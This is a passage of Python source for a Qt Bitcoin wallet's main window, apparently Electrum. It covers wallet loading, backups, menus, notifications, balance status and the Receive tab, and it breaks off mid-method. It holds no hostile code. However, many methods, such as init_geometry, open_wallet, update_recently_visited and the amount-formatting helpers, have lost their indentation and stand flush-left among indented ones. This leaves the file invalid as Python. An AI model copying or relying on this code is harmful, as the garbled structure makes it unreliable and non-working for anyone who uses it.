run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet: Abstract_Wallet):
        """Wire *wallet* into this window and bring up the GUI for it:
        start its task thread, refresh menus/tabs, restore geometry, and run
        the 'load_wallet' plugin hook."""
        wallet.thread = TaskThread(self, self.on_error)
        self.update_recently_visited(wallet.storage.path)
        if wallet.has_lightning():
            util.trigger_callback('channels_updated', wallet)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.channels_list.update()
        self.tabs.show()
        self.init_geometry()
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
    def watching_only_changed(self):
        """Refresh the window title and menu availability to reflect the
        wallet's watch-only / password / import-export capabilities."""
        name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
        title = '%s %s - %s' % (name, ELECTRUM_VERSION,
                                self.wallet.basename())
        extra = [self.wallet.db.get('wallet_type', '?')]
        if self.wallet.is_watching_only():
            extra.append(_('watching only'))
        title += ' [%s]'% ', '.join(extra)
        self.setWindowTitle(title)
        self.password_menu.setEnabled(self.wallet.may_have_password())
        self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
        self.import_address_menu.setVisible(self.wallet.can_import_address())
        self.export_menu.setEnabled(self.wallet.can_export())
    def warn_if_watching_only(self):
        """Pop a warning dialog when the opened wallet cannot spend funds."""
        if self.wallet.is_watching_only():
            msg = ' '.join([
                _("This wallet is watching-only."),
                _("This means you will not be able to spend Bitcoins with it."),
                _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
            ])
            self.show_warning(msg, title=_('Watch-only wallet'))
    def warn_if_testnet(self):
        """Warn (at most once per process) that the wallet runs on testnet,
        with a "don't show again" checkbox persisted to the config."""
        if not constants.net.TESTNET:
            return
        # user might have opted out already
        if self.config.get('dont_show_testnet_warning', False):
            return
        # only show once per process lifecycle
        if getattr(self.gui_object, '_warned_testnet', False):
            return
        self.gui_object._warned_testnet = True
        msg = ''.join([
            _("You are in testnet mode."), ' ',
            _("Testnet coins are worthless."), '\n',
            _("Testnet is separate from the main Bitcoin network. It is used for testing.")
        ])
        cb = QCheckBox(_("Don't show this again."))
        cb_checked = False
        def on_cb(x):
            # record the checkbox state; show_warning blocks until closed
            nonlocal cb_checked
            cb_checked = x == Qt.Checked
        cb.stateChanged.connect(on_cb)
        self.show_warning(msg, title=_('Testnet'), checkbox=cb)
        if cb_checked:
            self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
    def backup_wallet(self):
        """Ask for a backup directory and save a copy of the wallet file.

        Returns True on success, False if the dialog was cancelled, and None
        when no backup directory is configured or the copy fails (an error
        dialog is shown in those cases).
        """
        d = WindowModalDialog(self, _("File Backup"))
        vbox = QVBoxLayout(d)
        grid = QGridLayout()
        backup_help = ""
        backup_dir = self.config.get('backup_dir')
        backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
        msg = _('Please select a backup directory')
        if self.wallet.has_lightning() and self.wallet.lnworker.channels:
            msg += '\n\n' + ' '.join([
                _("Note that lightning channels will be converted to channel backups."),
                _("You cannot use channel backups to perform lightning payments."),
                _("Channel backups can only be used to request your channels to be closed.")
            ])
        self.backup_dir_e = QPushButton(backup_dir)
        self.backup_dir_e.clicked.connect(self.select_backup_dir)
        grid.addWidget(backup_dir_label, 1, 0)
        grid.addWidget(self.backup_dir_e, 1, 1)
        vbox.addLayout(grid)
        vbox.addWidget(WWLabel(msg))
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            return False
        # re-read the directory: the user may have changed it via the button
        backup_dir = self.config.get_backup_dir()
        if backup_dir is None:
            self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
            return
        try:
            new_path = self.wallet.save_backup(backup_dir)
        except BaseException as reason:
            self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
            return
        msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
        self.show_message(msg, title=_("Wallet backup created"))
        return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
    def init_menubar(self):
        """Build the window's menu bar: File, Wallet, View, Tools and Help
        menus, storing the actions that later need enabling/disabling
        (seed/password/import/export menus) as attributes."""
        menubar = QMenuBar()
        file_menu = menubar.addMenu(_("&File"))
        self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
        file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
        file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
        file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
        file_menu.addAction(_("Delete"), self.remove_wallet)
        file_menu.addSeparator()
        file_menu.addAction(_("&Quit"), self.close)
        wallet_menu = menubar.addMenu(_("&Wallet"))
        wallet_menu.addAction(_("&Information"), self.show_wallet_info)
        wallet_menu.addSeparator()
        self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
        self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
        self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
        self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
        self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
        self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
        self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
        wallet_menu.addSeparator()
        addresses_menu = wallet_menu.addMenu(_("&Addresses"))
        addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
        labels_menu = wallet_menu.addMenu(_("&Labels"))
        labels_menu.addAction(_("&Import"), self.do_import_labels)
        labels_menu.addAction(_("&Export"), self.do_export_labels)
        history_menu = wallet_menu.addMenu(_("&History"))
        history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
        history_menu.addAction(_("&Summary"), self.history_list.show_summary)
        history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
        history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
        contacts_menu = wallet_menu.addMenu(_("Contacts"))
        contacts_menu.addAction(_("&New"), self.new_contact_dialog)
        contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
        contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
        invoices_menu = wallet_menu.addMenu(_("Invoices"))
        invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
        invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
        requests_menu = wallet_menu.addMenu(_("Requests"))
        requests_menu.addAction(_("Import"), lambda: self.import_requests())
        requests_menu.addAction(_("Export"), lambda: self.export_requests())
        wallet_menu.addSeparator()
        wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
        def add_toggle_action(view_menu, tab):
            # Show/Hide entry whose label reflects the tab's current state
            is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
            item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
            tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
        view_menu = menubar.addMenu(_("&View"))
        add_toggle_action(view_menu, self.addresses_tab)
        add_toggle_action(view_menu, self.utxo_tab)
        add_toggle_action(view_menu, self.channels_tab)
        add_toggle_action(view_menu, self.contacts_tab)
        add_toggle_action(view_menu, self.console_tab)
        tools_menu = menubar.addMenu(_("&Tools"))  # type: QMenu
        preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog)  # type: QAction
        if sys.platform == 'darwin':
            # "Settings"/"Preferences" are all reserved keywords in macOS.
            # preferences_action will get picked up based on name (and put into a standardized location,
            # and given a standard reserved hotkey)
            # Hence, this menu item will be at a "uniform location re macOS processes"
            preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
            # Add another preferences item, to also have a "uniform location for Electrum between different OSes"
            tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
        tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
        tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
        tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
        tools_menu.addSeparator()
        tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
        tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
        tools_menu.addSeparator()
        paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
        raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
        raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
        raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
        raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
        raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
        self.raw_transaction_menu = raw_transaction_menu
        run_hook('init_menubar_tools', self, tools_menu)
        help_menu = menubar.addMenu(_("&Help"))
        help_menu.addAction(_("&About"), self.show_about)
        help_menu.addAction(_("&Check for updates"), self.show_update_check)
        help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
        help_menu.addSeparator()
        help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
        if not constants.net.TESTNET:
            help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
        help_menu.addAction(_("&Report Bug"), self.show_report_bug)
        help_menu.addSeparator()
        help_menu.addAction(_("&Donate to server"), self.donate_to_server)
        self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
    def show_about(self):
        """Show the standard About dialog with version and project blurb."""
        QMessageBox.about(self, "Electrum",
                          (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                           _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
                           _("You do not need to perform regular backups, because your wallet can be "
                             "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                           _("Startup times are instant because it operates in conjunction with high-performance "
                             "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
                           _("Uses icons from the Icons8 icon pack (icons8.com).")))
    def show_bitcoin_paper(self):
        """Open the Bitcoin whitepaper PDF, fetching it on first use.

        The PDF bytes are reconstructed from data embedded in the outputs of
        a well-known transaction and cached as bitcoin.pdf in the config dir.
        """
        filename = os.path.join(self.config.path, 'bitcoin.pdf')
        if not os.path.exists(filename):
            s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
            if not s:
                return
            # slice out the PDF hex from the raw tx; the magic offsets strip
            # script/value framing around the embedded data chunks
            s = s.split("0100000000000000")[1:-1]
            out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
            with open(filename, 'wb') as f:
                f.write(bytes.fromhex(out))
        webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
    def show_report_bug(self):
        """Show a dialog pointing users at the GitHub issue tracker."""
        msg = ' '.join([
            _("Please report any bugs as issues on github:<br/>"),
            f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
            _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
            _("Try to explain not only what the bug is, but how it occurs.")
        ])
        self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
    def notify_transactions(self):
        """Show desktop notifications for queued incoming transactions.

        Skipped while the wallet is syncing and rate-limited to once per 20
        seconds; three or more queued transactions are combined into a single
        summary notification.
        """
        if self.tx_notification_queue.qsize() == 0:
            return
        if not self.wallet.up_to_date:
            return # no notifications while syncing
        now = time.time()
        rate_limit = 20 # seconds
        if self.tx_notification_last_time + rate_limit > now:
            return
        self.tx_notification_last_time = now
        self.logger.info("Notifying GUI about new transactions")
        txns = []
        while True:
            try:
                txns.append(self.tx_notification_queue.get_nowait())
            except queue.Empty:
                break
        # Combine the transactions if there are at least three
        if len(txns) >= 3:
            total_amount = 0
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    continue
                total_amount += tx_wallet_delta.delta
            self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                        .format(len(txns), self.format_amount_and_units(total_amount)))
        else:
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    continue
                self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
    def notify(self, message):
        """Show a system-tray notification balloon with *message*."""
        if self.tray:
            try:
                # this requires Qt 5.9
                self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
            except TypeError:
                # older Qt: fall back to the standard information icon
                self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
    def timer_actions(self):
        """Periodic GUI-thread housekeeping driven by the window timer."""
        self.request_list.refresh_status()
        # Note this runs in the GUI thread
        if self.need_update.is_set():
            self.need_update.clear()
            self.update_wallet()
        elif not self.wallet.up_to_date:
            # this updates "synchronizing" progress
            self.update_status()
        # resolve aliases
        # FIXME this is a blocking network call that has a timeout of 5 sec
        self.payto_e.resolve()
        self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
    def connect_fields(self, window, btc_e, fiat_e, fee_e):
        """Link a BTC amount edit and a fiat edit so editing either updates
        the other via the current exchange rate; when *fee_e* is given, a BTC
        edit also triggers window.update_fee().

        The 'follows' flags break the feedback loop between the two edits.
        """
        def edit_changed(edit):
            if edit.follows:
                return  # change was programmatic (mirroring), not user input
            edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
            fiat_e.is_last_edited = (edit == fiat_e)
            amount = edit.get_amount()
            rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
            if rate.is_nan() or amount is None:
                # no usable rate/amount: blank out the mirrored side
                if edit is fiat_e:
                    btc_e.setText("")
                    if fee_e:
                        fee_e.setText("")
                else:
                    fiat_e.setText("")
            else:
                if edit is fiat_e:
                    btc_e.follows = True
                    btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                    btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    btc_e.follows = False
                    if fee_e:
                        window.update_fee()
                else:
                    fiat_e.follows = True
                    fiat_e.setText(self.fx.ccy_amount_str(
                        amount * Decimal(rate) / COIN, False))
                    fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    fiat_e.follows = False
        btc_e.follows = False
        fiat_e.follows = False
        fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
        btc_e.textChanged.connect(partial(edit_changed, btc_e))
        fiat_e.is_last_edited = False
    def update_status(self):
        """Refresh the status-bar text/icon and the tray tooltip.

        Shows offline / synchronizing / lagging states, otherwise the wallet
        balances (confirmed, unconfirmed, unmatured, lightning, fiat).
        """
        if not self.wallet:
            return
        if self.network is None:
            text = _("Offline")
            icon = read_QIcon("status_disconnected.png")
        elif self.network.is_connected():
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
            # Server height can be 0 after switching to a new server
            # until we get a headers subscription request response.
            # Display the synchronizing message in that case.
            if not self.wallet.up_to_date or server_height == 0:
                num_sent, num_answered = self.wallet.get_history_sync_state_details()
                text = ("{} ({}/{})"
                        .format(_("Synchronizing..."), num_answered, num_sent))
                icon = read_QIcon("status_waiting.png")
            elif server_lag > 1:
                text = _("Server is lagging ({} blocks)").format(server_lag)
                icon = read_QIcon("status_lagging%s.png"%fork_str)
            else:
                c, u, x = self.wallet.get_balance()
                text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
                if u:
                    text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
                if x:
                    text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
                if self.wallet.has_lightning():
                    l = self.wallet.lnworker.get_balance()
                    text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
                # append fiat balance and price
                if self.fx.is_enabled():
                    text += self.fx.get_fiat_status_text(c + u + x,
                        self.base_unit(), self.get_decimal_point()) or ''
                if not self.network.proxy:
                    icon = read_QIcon("status_connected%s.png"%fork_str)
                else:
                    icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
        else:
            if self.network.proxy:
                text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
            else:
                text = _("Not connected")
            icon = read_QIcon("status_disconnected.png")
        self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
        self.balance_label.setText(text)
        if self.status_button:
            self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
    def update_tabs(self, wallet=None):
        """Refresh all tab views; no-op when *wallet* is another window's wallet."""
        if wallet is None:
            wallet = self.wallet
        if wallet != self.wallet:
            return
        self.history_model.refresh('update_tabs')
        self.request_list.update()
        self.address_list.update()
        self.utxo_list.update()
        self.contact_list.update()
        self.invoice_list.update()
        self.channels_list.update_rows.emit(wallet)
        self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
    def create_history_tab(self):
        """Build the transaction-history tab (model, list view, toolbar)."""
        self.history_model = HistoryModel(self)
        self.history_list = l = HistoryList(self, self.history_model)
        self.history_model.set_view(self.history_list)
        l.searchable_list = l
        toolbar = l.create_toolbar(self.config)
        toolbar_shown = bool(self.config.get('show_toolbar_history', False))
        l.show_toolbar(toolbar_shown)
        return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
    def create_receive_tab(self):
        """Build the Receive tab: request form (description, amount, expiry),
        the address/request/QR tab widget and the pending-requests list."""
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.receive_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)
        self.receive_message_e = QLineEdit()
        grid.addWidget(QLabel(_('Description')), 0, 0)
        grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
        self.receive_message_e.textChanged.connect(self.update_receive_qr)
        self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
        grid.addWidget(QLabel(_('Requested amount')), 1, 0)
        grid.addWidget(self.receive_amount_e, 1, 1)
        self.receive_amount_e.textChanged.connect(self.update_receive_qr)
        self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_receive_e.setVisible(False)
        grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
        self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
        self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
        self.expires_combo = QComboBox()
        evl = sorted(pr_expiration_values.items())
        evl_keys = [i[0] for i in evl]
        evl_values = [i[1] for i in evl]
        default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
        try:
            i = evl_keys.index(default_expiry)
        except ValueError:
            i = 0  # configured expiry not among the presets: use the first
        self.expires_combo.addItems(evl_values)
        self.expires_combo.setCurrentIndex(i)
        self.expires_combo.setFixedWidth(self.receive_amount_e.width())
        def on_expiry(i):
            # persist the newly selected expiry preset
            self.config.set_key('request_expiry', evl_keys[i])
        self.expires_combo.currentIndexChanged.connect(on_expiry)
        msg = ''.join([
            _('Expiration date of your request.'), ' ',
            _('This information is seen by the recipient if you send them a signed payment request.'),
            '\n\n',
            _('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
            _('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ',
            _('You can reuse a bitcoin address any number of times but it is not good for your privacy.'),
            '\n\n',
            _('For Lightning requests, payments will not be accepted after the expiration.'),
        ])
        grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
        grid.addWidget(self.expires_combo, 2, 1)
        self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(1)
        self.expires_label.setFocusPolicy(Qt.NoFocus)
        self.expires_label.hide()
        grid.addWidget(self.expires_label, 2, 1)
        self.clear_invoice_button = QPushButton(_('Clear'))
        self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
        self.create_invoice_button = QPushButton(_('New Address'))
        self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
        self.create_invoice_button.setToolTip('Create on-chain request')
        self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
        self.receive_buttons = buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.clear_invoice_button)
        buttons.addWidget(self.create_invoice_button)
        if self.wallet.has_lightning():
            # second button for lightning requests
            self.create_invoice_button.setText(_('New Address'))
            self.create_lightning_invoice_button = QPushButton(_('Lightning'))
            self.create_lightning_invoice_button.setToolTip('Create lightning request')
            self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
            self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
            buttons.addWidget(self.create_lightning_invoice_button)
        grid.addLayout(buttons, 4, 3, 1, 2)
        self.receive_payreq_e = ButtonsTextEdit()
        self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
        self.receive_payreq_e.addCopyButton(self.app)
        self.receive_payreq_e.setReadOnly(True)
        self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
        self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
        self.receive_qr = QRCodeWidget(fixedSize=220)
        self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
        self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
        self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
        self.receive_address_e = ButtonsTextEdit()
        self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
        self.receive_address_e.addCopyButton(self.app)
        self.receive_address_e.setReadOnly(True)
        self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
        qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
        qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
        self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
        self.receive_requests_label = QLabel(_('Receive queue'))
        from .request_list import RequestList
        self.request_list = RequestList(self)
        receive_tabs = QTabWidget()
        receive_tabs.addTab(self.receive_address_e, _('Address'))
        receive_tabs.addTab(self.receive_payreq_e, _('Request'))
        receive_tabs.addTab(self.receive_qr, _('QR Code'))
        receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
        receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
        receive_tabs_sp = receive_tabs.sizePolicy()
        receive_tabs_sp.setRetainSizeWhenHidden(True)
        receive_tabs.setSizePolicy(receive_tabs_sp)
        def maybe_hide_receive_tabs():
            # only show the address/request/QR widget once a request exists
            receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
        self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
        maybe_hide_receive_tabs()
        # layout
        vbox_g = QVBoxLayout()
        vbox_g.addLayout(grid)
        vbox_g.addStretch()
        hbox = QHBoxLayout()
        hbox.addLayout(vbox_g)
        hbox.addStretch()
        hbox.addWidget(receive_tabs)
        w = QWidget()
        w.searchable_list = self.request_list
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.receive_requests_label)
        vbox.addWidget(self.request_list)
        vbox.setStretchFactor(self.request_list, 1000)
        return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
    def sign_payment_request(self, addr):
        """Sign the payment request for *addr* with the configured alias
        identity, prompting for the wallet password when needed.

        Silently does nothing when no alias is configured/resolved, or the
        alias address is not controlled by this wallet.
        """
        alias = self.config.get('alias')
        if alias and self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            if alias_addr:
                if self.wallet.is_mine(alias_addr):
                    msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                    password = None
                    if self.wallet.has_keystore_encryption():
                        password = self.password_dialog(msg)
                        if not password:
                            return  # user cancelled the password prompt
                    try:
                        self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                    except Exception as e:
                        self.show_error(repr(e))
                        return
                else:
                    return
    def create_invoice(self, is_lightning):
        """Create a receive request (on-chain or lightning) from the form
        fields, select it in the request list and copy it to the clipboard."""
        amount = self.receive_amount_e.get_amount()
        message = self.receive_message_e.text()
        expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
        if is_lightning:
            if not self.wallet.lnworker.channels:
                self.show_error(_("You need to open a Lightning channel first."))
                return
            # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
            key = self.wallet.lnworker.add_request(amount, message, expiry)
        else:
            key = self.create_bitcoin_request(amount, message, expiry)
            if not key:
                return  # user declined address reuse / new-address warning
            self.address_list.update()
        assert key is not None
        self.request_list.update()
        self.request_list.select_key(key)
        # clear request fields
        self.receive_amount_e.setText('')
        self.receive_message_e.setText('')
        # copy to clipboard
        r = self.wallet.get_request(key)
        content = r.invoice if r.is_lightning() else r.get_address()
        title = _('Invoice') if is_lightning else _('Address')
        self.do_copy(content, title=title)
    def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
        """Create and store an onchain payment request.

        Returns the address used (which also serves as the request key),
        or None if the user aborted or the request could not be added.
        """
        addr = self.wallet.get_unused_address()
        if addr is None:
            if not self.wallet.is_deterministic():  # imported wallet
                # cannot derive fresh addresses: offer to reuse one
                msg = [
                    _('No more addresses in your wallet.'), ' ',
                    _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
                    _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
                    _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
                   ]
